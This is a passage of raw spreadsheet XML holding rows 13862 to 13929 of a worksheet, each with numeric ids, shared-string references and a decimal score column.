      <c r="F13862" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13863" ht="15.75" customHeight="1">
      <c r="A13863" s="1">
        <v>2966.0</v>
      </c>
      <c r="B13863" s="2">
        <v>3.607364E7</v>
      </c>
      <c r="C13863" s="2" t="s">
        <v>13342</v>
      </c>
      <c r="D13863" s="2">
        <v>1.0</v>
      </c>
      <c r="E13863" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13863" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13864" ht="15.75" customHeight="1">
      <c r="A13864" s="1">
        <v>5468.0</v>
      </c>
      <c r="B13864" s="2">
        <v>4.5672681E7</v>
      </c>
      <c r="C13864" s="2" t="s">
        <v>13343</v>
      </c>
      <c r="D13864" s="2">
        <v>1.0</v>
      </c>
      <c r="E13864" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13864" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13865" ht="15.75" customHeight="1">
      <c r="A13865" s="1">
        <v>6070.0</v>
      </c>
      <c r="B13865" s="2">
        <v>4.76255E7</v>
      </c>
      <c r="C13865" s="2" t="s">
        <v>13344</v>
      </c>
      <c r="D13865" s="2">
        <v>1.0</v>
      </c>
      <c r="E13865" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13865" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13866" ht="15.75" customHeight="1">
      <c r="A13866" s="1">
        <v>8175.0</v>
      </c>
      <c r="B13866" s="2">
        <v>5.3237968E7</v>
      </c>
      <c r="C13866" s="2" t="s">
        <v>13345</v>
      </c>
      <c r="D13866" s="2">
        <v>1.0</v>
      </c>
      <c r="E13866" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13866" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13867" ht="15.75" customHeight="1">
      <c r="A13867" s="1">
        <v>8248.0</v>
      </c>
      <c r="B13867" s="2">
        <v>5.3377408E7</v>
      </c>
      <c r="C13867" s="2" t="s">
        <v>13346</v>
      </c>
      <c r="D13867" s="2">
        <v>1.0</v>
      </c>
      <c r="E13867" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13867" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13868" ht="15.75" customHeight="1">
      <c r="A13868" s="1">
        <v>10670.0</v>
      </c>
      <c r="B13868" s="2">
        <v>1.4457122E7</v>
      </c>
      <c r="C13868" s="2" t="s">
        <v>13347</v>
      </c>
      <c r="D13868" s="2">
        <v>1.0</v>
      </c>
      <c r="E13868" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13868" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13869" ht="15.75" customHeight="1">
      <c r="A13869" s="1">
        <v>10781.0</v>
      </c>
      <c r="B13869" s="2">
        <v>1.5658792E7</v>
      </c>
      <c r="C13869" s="2" t="s">
        <v>13348</v>
      </c>
      <c r="D13869" s="2">
        <v>1.0</v>
      </c>
      <c r="E13869" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13869" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13870" ht="15.75" customHeight="1">
      <c r="A13870" s="1">
        <v>10943.0</v>
      </c>
      <c r="B13870" s="2">
        <v>1.7068152E7</v>
      </c>
      <c r="C13870" s="2" t="s">
        <v>13349</v>
      </c>
      <c r="D13870" s="2">
        <v>1.0</v>
      </c>
      <c r="E13870" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13870" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13871" ht="15.75" customHeight="1">
      <c r="A13871" s="1">
        <v>12211.0</v>
      </c>
      <c r="B13871" s="2">
        <v>2.7639928E7</v>
      </c>
      <c r="C13871" s="2" t="s">
        <v>13350</v>
      </c>
      <c r="D13871" s="2">
        <v>1.0</v>
      </c>
      <c r="E13871" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13871" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13872" ht="15.75" customHeight="1">
      <c r="A13872" s="1">
        <v>13102.0</v>
      </c>
      <c r="B13872" s="2">
        <v>3.3532359E7</v>
      </c>
      <c r="C13872" s="2" t="s">
        <v>13351</v>
      </c>
      <c r="D13872" s="2">
        <v>1.0</v>
      </c>
      <c r="E13872" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13872" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13873" ht="15.75" customHeight="1">
      <c r="A13873" s="1">
        <v>14308.0</v>
      </c>
      <c r="B13873" s="2">
        <v>3.8625921E7</v>
      </c>
      <c r="C13873" s="2" t="s">
        <v>13352</v>
      </c>
      <c r="D13873" s="2">
        <v>1.0</v>
      </c>
      <c r="E13873" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13873" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13874" ht="15.75" customHeight="1">
      <c r="A13874" s="1">
        <v>18860.0</v>
      </c>
      <c r="B13874" s="2">
        <v>5.3984781E7</v>
      </c>
      <c r="C13874" s="2" t="s">
        <v>13353</v>
      </c>
      <c r="D13874" s="2">
        <v>1.0</v>
      </c>
      <c r="E13874" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13874" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13875" ht="15.75" customHeight="1">
      <c r="A13875" s="1">
        <v>21231.0</v>
      </c>
      <c r="B13875" s="2">
        <v>1.966619E7</v>
      </c>
      <c r="C13875" s="2" t="s">
        <v>13354</v>
      </c>
      <c r="D13875" s="2">
        <v>1.0</v>
      </c>
      <c r="E13875" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13875" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13876" ht="15.75" customHeight="1">
      <c r="A13876" s="1">
        <v>22300.0</v>
      </c>
      <c r="B13876" s="2">
        <v>3.3589414E7</v>
      </c>
      <c r="C13876" s="2" t="s">
        <v>13355</v>
      </c>
      <c r="D13876" s="2">
        <v>1.0</v>
      </c>
      <c r="E13876" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13876" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13877" ht="15.75" customHeight="1">
      <c r="A13877" s="1">
        <v>24377.0</v>
      </c>
      <c r="B13877" s="2">
        <v>1.0767649E7</v>
      </c>
      <c r="C13877" s="2" t="s">
        <v>13356</v>
      </c>
      <c r="D13877" s="2">
        <v>1.0</v>
      </c>
      <c r="E13877" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13877" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13878" ht="15.75" customHeight="1">
      <c r="A13878" s="1">
        <v>26646.0</v>
      </c>
      <c r="B13878" s="2">
        <v>1.8048644E7</v>
      </c>
      <c r="C13878" s="2" t="s">
        <v>13357</v>
      </c>
      <c r="D13878" s="2">
        <v>1.0</v>
      </c>
      <c r="E13878" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13878" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13879" ht="15.75" customHeight="1">
      <c r="A13879" s="1">
        <v>27006.0</v>
      </c>
      <c r="B13879" s="2">
        <v>1.9948284E7</v>
      </c>
      <c r="C13879" s="2" t="s">
        <v>13358</v>
      </c>
      <c r="D13879" s="2">
        <v>1.0</v>
      </c>
      <c r="E13879" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13879" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13880" ht="15.75" customHeight="1">
      <c r="A13880" s="1">
        <v>28175.0</v>
      </c>
      <c r="B13880" s="2">
        <v>2.4982864E7</v>
      </c>
      <c r="C13880" s="2" t="s">
        <v>13356</v>
      </c>
      <c r="D13880" s="2">
        <v>1.0</v>
      </c>
      <c r="E13880" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13880" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13881" ht="15.75" customHeight="1">
      <c r="A13881" s="1">
        <v>29753.0</v>
      </c>
      <c r="B13881" s="2">
        <v>3.4763803E7</v>
      </c>
      <c r="C13881" s="2" t="s">
        <v>13359</v>
      </c>
      <c r="D13881" s="2">
        <v>1.0</v>
      </c>
      <c r="E13881" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13881" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13882" ht="15.75" customHeight="1">
      <c r="A13882" s="1">
        <v>30287.0</v>
      </c>
      <c r="B13882" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C13882" s="2" t="s">
        <v>13360</v>
      </c>
      <c r="D13882" s="2">
        <v>1.0</v>
      </c>
      <c r="E13882" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13882" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13883" ht="15.75" customHeight="1">
      <c r="A13883" s="1">
        <v>30792.0</v>
      </c>
      <c r="B13883" s="2">
        <v>4.498745E7</v>
      </c>
      <c r="C13883" s="2" t="s">
        <v>13361</v>
      </c>
      <c r="D13883" s="2">
        <v>1.0</v>
      </c>
      <c r="E13883" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13883" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13884" ht="15.75" customHeight="1">
      <c r="A13884" s="1">
        <v>32592.0</v>
      </c>
      <c r="B13884" s="2">
        <v>5802568.0</v>
      </c>
      <c r="C13884" s="2" t="s">
        <v>13362</v>
      </c>
      <c r="D13884" s="2">
        <v>1.0</v>
      </c>
      <c r="E13884" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13884" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="13885" ht="15.75" customHeight="1">
      <c r="A13885" s="1">
        <v>8201.0</v>
      </c>
      <c r="B13885" s="2">
        <v>5.3279792E7</v>
      </c>
      <c r="C13885" s="2" t="s">
        <v>13363</v>
      </c>
      <c r="D13885" s="2">
        <v>1.0</v>
      </c>
      <c r="E13885" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13885" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="13886" ht="15.75" customHeight="1">
      <c r="A13886" s="1">
        <v>26863.0</v>
      </c>
      <c r="B13886" s="2">
        <v>1.90372E7</v>
      </c>
      <c r="C13886" s="2" t="s">
        <v>13364</v>
      </c>
      <c r="D13886" s="2">
        <v>1.0</v>
      </c>
      <c r="E13886" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13886" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="13887" ht="15.75" customHeight="1">
      <c r="A13887" s="1">
        <v>7249.0</v>
      </c>
      <c r="B13887" s="2">
        <v>5.0705605E7</v>
      </c>
      <c r="C13887" s="2" t="s">
        <v>13365</v>
      </c>
      <c r="D13887" s="2">
        <v>1.0</v>
      </c>
      <c r="E13887" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13887" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="13888" ht="15.75" customHeight="1">
      <c r="A13888" s="1">
        <v>33466.0</v>
      </c>
      <c r="B13888" s="2">
        <v>7953197.0</v>
      </c>
      <c r="C13888" s="2" t="s">
        <v>13366</v>
      </c>
      <c r="D13888" s="2">
        <v>1.0</v>
      </c>
      <c r="E13888" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13888" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="13889" ht="15.75" customHeight="1">
      <c r="A13889" s="1">
        <v>9305.0</v>
      </c>
      <c r="B13889" s="2">
        <v>5.5562122E7</v>
      </c>
      <c r="C13889" s="2" t="s">
        <v>13367</v>
      </c>
      <c r="D13889" s="2">
        <v>1.0</v>
      </c>
      <c r="E13889" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13889" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="13890" ht="15.75" customHeight="1">
      <c r="A13890" s="1">
        <v>25731.0</v>
      </c>
      <c r="B13890" s="2">
        <v>1.4552933E7</v>
      </c>
      <c r="C13890" s="2" t="s">
        <v>13368</v>
      </c>
      <c r="D13890" s="2">
        <v>1.0</v>
      </c>
      <c r="E13890" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13890" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="13891" ht="15.75" customHeight="1">
      <c r="A13891" s="1">
        <v>3242.0</v>
      </c>
      <c r="B13891" s="2">
        <v>3.7367572E7</v>
      </c>
      <c r="C13891" s="2" t="s">
        <v>13369</v>
      </c>
      <c r="D13891" s="2">
        <v>1.0</v>
      </c>
      <c r="E13891" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13891" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="13892" ht="15.75" customHeight="1">
      <c r="A13892" s="1">
        <v>4975.0</v>
      </c>
      <c r="B13892" s="2">
        <v>4.4113956E7</v>
      </c>
      <c r="C13892" s="2" t="s">
        <v>13370</v>
      </c>
      <c r="D13892" s="2">
        <v>1.0</v>
      </c>
      <c r="E13892" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13892" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="13893" ht="15.75" customHeight="1">
      <c r="A13893" s="1">
        <v>7791.0</v>
      </c>
      <c r="B13893" s="2">
        <v>5.2201484E7</v>
      </c>
      <c r="C13893" s="2" t="s">
        <v>13371</v>
      </c>
      <c r="D13893" s="2">
        <v>1.0</v>
      </c>
      <c r="E13893" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13893" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="13894" ht="15.75" customHeight="1">
      <c r="A13894" s="1">
        <v>14731.0</v>
      </c>
      <c r="B13894" s="2">
        <v>4.067929E7</v>
      </c>
      <c r="C13894" s="2" t="s">
        <v>13372</v>
      </c>
      <c r="D13894" s="2">
        <v>1.0</v>
      </c>
      <c r="E13894" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13894" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="13895" ht="15.75" customHeight="1">
      <c r="A13895" s="1">
        <v>17744.0</v>
      </c>
      <c r="B13895" s="2">
        <v>5.0680936E7</v>
      </c>
      <c r="C13895" s="2" t="s">
        <v>13373</v>
      </c>
      <c r="D13895" s="2">
        <v>1.0</v>
      </c>
      <c r="E13895" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13895" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="13896" ht="15.75" customHeight="1">
      <c r="A13896" s="1">
        <v>17862.0</v>
      </c>
      <c r="B13896" s="2">
        <v>5.1002884E7</v>
      </c>
      <c r="C13896" s="2" t="s">
        <v>13374</v>
      </c>
      <c r="D13896" s="2">
        <v>1.0</v>
      </c>
      <c r="E13896" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13896" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="13897" ht="15.75" customHeight="1">
      <c r="A13897" s="1">
        <v>18910.0</v>
      </c>
      <c r="B13897" s="2">
        <v>5.4197445E7</v>
      </c>
      <c r="C13897" s="2" t="s">
        <v>13375</v>
      </c>
      <c r="D13897" s="2">
        <v>1.0</v>
      </c>
      <c r="E13897" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13897" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="13898" ht="15.75" customHeight="1">
      <c r="A13898" s="1">
        <v>19556.0</v>
      </c>
      <c r="B13898" s="2">
        <v>5.605664E7</v>
      </c>
      <c r="C13898" s="2" t="s">
        <v>13376</v>
      </c>
      <c r="D13898" s="2">
        <v>1.0</v>
      </c>
      <c r="E13898" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13898" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="13899" ht="15.75" customHeight="1">
      <c r="A13899" s="1">
        <v>18225.0</v>
      </c>
      <c r="B13899" s="2">
        <v>5.2106152E7</v>
      </c>
      <c r="C13899" s="2" t="s">
        <v>13377</v>
      </c>
      <c r="D13899" s="2">
        <v>1.0</v>
      </c>
      <c r="E13899" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13899" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="13900" ht="15.75" customHeight="1">
      <c r="A13900" s="1">
        <v>22175.0</v>
      </c>
      <c r="B13900" s="2">
        <v>3.1678172E7</v>
      </c>
      <c r="C13900" s="2" t="s">
        <v>13378</v>
      </c>
      <c r="D13900" s="2">
        <v>1.0</v>
      </c>
      <c r="E13900" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13900" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="13901" ht="15.75" customHeight="1">
      <c r="A13901" s="1">
        <v>22972.0</v>
      </c>
      <c r="B13901" s="2">
        <v>4.9241795E7</v>
      </c>
      <c r="C13901" s="2" t="s">
        <v>13379</v>
      </c>
      <c r="D13901" s="2">
        <v>1.0</v>
      </c>
      <c r="E13901" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13901" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="13902" ht="15.75" customHeight="1">
      <c r="A13902" s="1">
        <v>23213.0</v>
      </c>
      <c r="B13902" s="2">
        <v>5.2719746E7</v>
      </c>
      <c r="C13902" s="2" t="s">
        <v>13380</v>
      </c>
      <c r="D13902" s="2">
        <v>1.0</v>
      </c>
      <c r="E13902" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13902" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="13903" ht="15.75" customHeight="1">
      <c r="A13903" s="1">
        <v>26889.0</v>
      </c>
      <c r="B13903" s="2">
        <v>1.9247805E7</v>
      </c>
      <c r="C13903" s="2" t="s">
        <v>13381</v>
      </c>
      <c r="D13903" s="2">
        <v>1.0</v>
      </c>
      <c r="E13903" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13903" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="13904" ht="15.75" customHeight="1">
      <c r="A13904" s="1">
        <v>31804.0</v>
      </c>
      <c r="B13904" s="2">
        <v>5.2431411E7</v>
      </c>
      <c r="C13904" s="2" t="s">
        <v>13382</v>
      </c>
      <c r="D13904" s="2">
        <v>1.0</v>
      </c>
      <c r="E13904" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13904" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="13905" ht="15.75" customHeight="1">
      <c r="A13905" s="1">
        <v>33356.0</v>
      </c>
      <c r="B13905" s="2">
        <v>7615453.0</v>
      </c>
      <c r="C13905" s="2" t="s">
        <v>13383</v>
      </c>
      <c r="D13905" s="2">
        <v>1.0</v>
      </c>
      <c r="E13905" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13905" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="13906" ht="15.75" customHeight="1">
      <c r="A13906" s="1">
        <v>19328.0</v>
      </c>
      <c r="B13906" s="2">
        <v>5.5321644E7</v>
      </c>
      <c r="C13906" s="2" t="s">
        <v>13384</v>
      </c>
      <c r="D13906" s="2">
        <v>1.0</v>
      </c>
      <c r="E13906" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13906" s="2">
        <v>0.0909961685823755</v>
      </c>
    </row>
    <row r="13907" ht="15.75" customHeight="1">
      <c r="A13907" s="1">
        <v>26875.0</v>
      </c>
      <c r="B13907" s="2">
        <v>1.9144073E7</v>
      </c>
      <c r="C13907" s="2" t="s">
        <v>13385</v>
      </c>
      <c r="D13907" s="2">
        <v>1.0</v>
      </c>
      <c r="E13907" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13907" s="2">
        <v>0.08823529411764704</v>
      </c>
    </row>
    <row r="13908" ht="15.75" customHeight="1">
      <c r="A13908" s="1">
        <v>8522.0</v>
      </c>
      <c r="B13908" s="2">
        <v>5.4087097E7</v>
      </c>
      <c r="C13908" s="2" t="s">
        <v>13386</v>
      </c>
      <c r="D13908" s="2">
        <v>1.0</v>
      </c>
      <c r="E13908" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13908" s="2">
        <v>0.8331944444444446</v>
      </c>
    </row>
    <row r="13909" ht="15.75" customHeight="1">
      <c r="A13909" s="1">
        <v>3340.0</v>
      </c>
      <c r="B13909" s="2">
        <v>3.7711762E7</v>
      </c>
      <c r="C13909" s="2" t="s">
        <v>13388</v>
      </c>
      <c r="D13909" s="2">
        <v>1.0</v>
      </c>
      <c r="E13909" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13909" s="2">
        <v>0.6388888888888888</v>
      </c>
    </row>
    <row r="13910" ht="15.75" customHeight="1">
      <c r="A13910" s="1">
        <v>2485.0</v>
      </c>
      <c r="B13910" s="2">
        <v>3.3879377E7</v>
      </c>
      <c r="C13910" s="2" t="s">
        <v>13389</v>
      </c>
      <c r="D13910" s="2">
        <v>1.0</v>
      </c>
      <c r="E13910" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13910" s="2">
        <v>0.4440035273368607</v>
      </c>
    </row>
    <row r="13911" ht="15.75" customHeight="1">
      <c r="A13911" s="1">
        <v>2475.0</v>
      </c>
      <c r="B13911" s="2">
        <v>3.3843613E7</v>
      </c>
      <c r="C13911" s="2" t="s">
        <v>13390</v>
      </c>
      <c r="D13911" s="2">
        <v>1.0</v>
      </c>
      <c r="E13911" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13911" s="2">
        <v>0.4182692307692308</v>
      </c>
    </row>
    <row r="13912" ht="15.75" customHeight="1">
      <c r="A13912" s="1">
        <v>4890.0</v>
      </c>
      <c r="B13912" s="2">
        <v>4.3869659E7</v>
      </c>
      <c r="C13912" s="2" t="s">
        <v>13391</v>
      </c>
      <c r="D13912" s="2">
        <v>1.0</v>
      </c>
      <c r="E13912" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13912" s="2">
        <v>0.4102182539682539</v>
      </c>
    </row>
    <row r="13913" ht="15.75" customHeight="1">
      <c r="A13913" s="1">
        <v>4893.0</v>
      </c>
      <c r="B13913" s="2">
        <v>4.3869659E7</v>
      </c>
      <c r="C13913" s="2" t="s">
        <v>13392</v>
      </c>
      <c r="D13913" s="2">
        <v>1.0</v>
      </c>
      <c r="E13913" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13913" s="2">
        <v>0.4097222222222222</v>
      </c>
    </row>
    <row r="13914" ht="15.75" customHeight="1">
      <c r="A13914" s="1">
        <v>6325.0</v>
      </c>
      <c r="B13914" s="2">
        <v>4.8281337E7</v>
      </c>
      <c r="C13914" s="2" t="s">
        <v>13393</v>
      </c>
      <c r="D13914" s="2">
        <v>1.0</v>
      </c>
      <c r="E13914" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13914" s="2">
        <v>0.4034267912772584</v>
      </c>
    </row>
    <row r="13915" ht="15.75" customHeight="1">
      <c r="A13915" s="1">
        <v>733.0</v>
      </c>
      <c r="B13915" s="2">
        <v>2.0794796E7</v>
      </c>
      <c r="C13915" s="2" t="s">
        <v>13394</v>
      </c>
      <c r="D13915" s="2">
        <v>1.0</v>
      </c>
      <c r="E13915" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13915" s="2">
        <v>0.3980034722222222</v>
      </c>
    </row>
    <row r="13916" ht="15.75" customHeight="1">
      <c r="A13916" s="1">
        <v>9090.0</v>
      </c>
      <c r="B13916" s="2">
        <v>5.5139767E7</v>
      </c>
      <c r="C13916" s="2" t="s">
        <v>13395</v>
      </c>
      <c r="D13916" s="2">
        <v>1.0</v>
      </c>
      <c r="E13916" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13916" s="2">
        <v>0.3954475308641974</v>
      </c>
    </row>
    <row r="13917" ht="15.75" customHeight="1">
      <c r="A13917" s="1">
        <v>3128.0</v>
      </c>
      <c r="B13917" s="2">
        <v>3.6845377E7</v>
      </c>
      <c r="C13917" s="2" t="s">
        <v>13396</v>
      </c>
      <c r="D13917" s="2">
        <v>1.0</v>
      </c>
      <c r="E13917" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13917" s="2">
        <v>0.3948948948948949</v>
      </c>
    </row>
    <row r="13918" ht="15.75" customHeight="1">
      <c r="A13918" s="1">
        <v>4438.0</v>
      </c>
      <c r="B13918" s="2">
        <v>4.2352482E7</v>
      </c>
      <c r="C13918" s="2" t="s">
        <v>13397</v>
      </c>
      <c r="D13918" s="2">
        <v>1.0</v>
      </c>
      <c r="E13918" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13918" s="2">
        <v>0.3816137566137566</v>
      </c>
    </row>
    <row r="13919" ht="15.75" customHeight="1">
      <c r="A13919" s="1">
        <v>8281.0</v>
      </c>
      <c r="B13919" s="2">
        <v>5.3472643E7</v>
      </c>
      <c r="C13919" s="2" t="s">
        <v>13398</v>
      </c>
      <c r="D13919" s="2">
        <v>1.0</v>
      </c>
      <c r="E13919" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13919" s="2">
        <v>0.3722659667541558</v>
      </c>
    </row>
    <row r="13920" ht="15.75" customHeight="1">
      <c r="A13920" s="1">
        <v>8135.0</v>
      </c>
      <c r="B13920" s="2">
        <v>5.3119129E7</v>
      </c>
      <c r="C13920" s="2" t="s">
        <v>13399</v>
      </c>
      <c r="D13920" s="2">
        <v>1.0</v>
      </c>
      <c r="E13920" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13920" s="2">
        <v>0.3561728395061728</v>
      </c>
    </row>
    <row r="13921" ht="15.75" customHeight="1">
      <c r="A13921" s="1">
        <v>10263.0</v>
      </c>
      <c r="B13921" s="2">
        <v>5.7581346E7</v>
      </c>
      <c r="C13921" s="2" t="s">
        <v>13400</v>
      </c>
      <c r="D13921" s="2">
        <v>1.0</v>
      </c>
      <c r="E13921" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13921" s="2">
        <v>0.3551587301587302</v>
      </c>
    </row>
    <row r="13922" ht="15.75" customHeight="1">
      <c r="A13922" s="1">
        <v>2343.0</v>
      </c>
      <c r="B13922" s="2">
        <v>3.3041819E7</v>
      </c>
      <c r="C13922" s="2" t="s">
        <v>13401</v>
      </c>
      <c r="D13922" s="2">
        <v>1.0</v>
      </c>
      <c r="E13922" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13922" s="2">
        <v>0.3482384823848238</v>
      </c>
    </row>
    <row r="13923" ht="15.75" customHeight="1">
      <c r="A13923" s="1">
        <v>4990.0</v>
      </c>
      <c r="B13923" s="2">
        <v>4.4145434E7</v>
      </c>
      <c r="C13923" s="2" t="s">
        <v>13402</v>
      </c>
      <c r="D13923" s="2">
        <v>1.0</v>
      </c>
      <c r="E13923" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13923" s="2">
        <v>0.3456196581196581</v>
      </c>
    </row>
    <row r="13924" ht="15.75" customHeight="1">
      <c r="A13924" s="1">
        <v>6583.0</v>
      </c>
      <c r="B13924" s="2">
        <v>4.8966373E7</v>
      </c>
      <c r="C13924" s="2" t="s">
        <v>13403</v>
      </c>
      <c r="D13924" s="2">
        <v>1.0</v>
      </c>
      <c r="E13924" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13924" s="2">
        <v>0.3450080515297906</v>
      </c>
    </row>
    <row r="13925" ht="15.75" customHeight="1">
      <c r="A13925" s="1">
        <v>9675.0</v>
      </c>
      <c r="B13925" s="2">
        <v>5.632529E7</v>
      </c>
      <c r="C13925" s="2" t="s">
        <v>13404</v>
      </c>
      <c r="D13925" s="2">
        <v>1.0</v>
      </c>
      <c r="E13925" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13925" s="2">
        <v>0.3366402116402116</v>
      </c>
    </row>
    <row r="13926" ht="15.75" customHeight="1">
      <c r="A13926" s="1">
        <v>9676.0</v>
      </c>
      <c r="B13926" s="2">
        <v>5.632529E7</v>
      </c>
      <c r="C13926" s="2" t="s">
        <v>13405</v>
      </c>
      <c r="D13926" s="2">
        <v>1.0</v>
      </c>
      <c r="E13926" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13926" s="2">
        <v>0.3301404853128991</v>
      </c>
    </row>
    <row r="13927" ht="15.75" customHeight="1">
      <c r="A13927" s="1">
        <v>9677.0</v>
      </c>
      <c r="B13927" s="2">
        <v>5.632529E7</v>
      </c>
      <c r="C13927" s="2" t="s">
        <v>13406</v>
      </c>
      <c r="D13927" s="2">
        <v>1.0</v>
      </c>
      <c r="E13927" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13927" s="2">
        <v>0.3277777777777777</v>
      </c>
    </row>
    <row r="13928" ht="15.75" customHeight="1">
      <c r="A13928" s="1">
        <v>5687.0</v>
      </c>
      <c r="B13928" s="2">
        <v>4.6428396E7</v>
      </c>
      <c r="C13928" s="2" t="s">
        <v>13407</v>
      </c>
      <c r="D13928" s="2">
        <v>1.0</v>
      </c>
      <c r="E13928" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13928" s="2">
        <v>0.2998575498575498</v>
      </c>
    </row>
    <row r="13929" ht="15.75" customHeight="1">
      <c r="A13929" s="1">
        <v>9674.0</v>
      </c>
      <c r="B13929" s="2">
        <v>5.632529E7</v>
      </c>
      <c r="C13929" s="2" t="s">
        <v>13408</v>
      </c>
      <c r="D13929" s="2">
        <v>1.0</v>
      </c>
      <c r="E13929" s="3" t="s">
        <v>13387</v>
      </c>
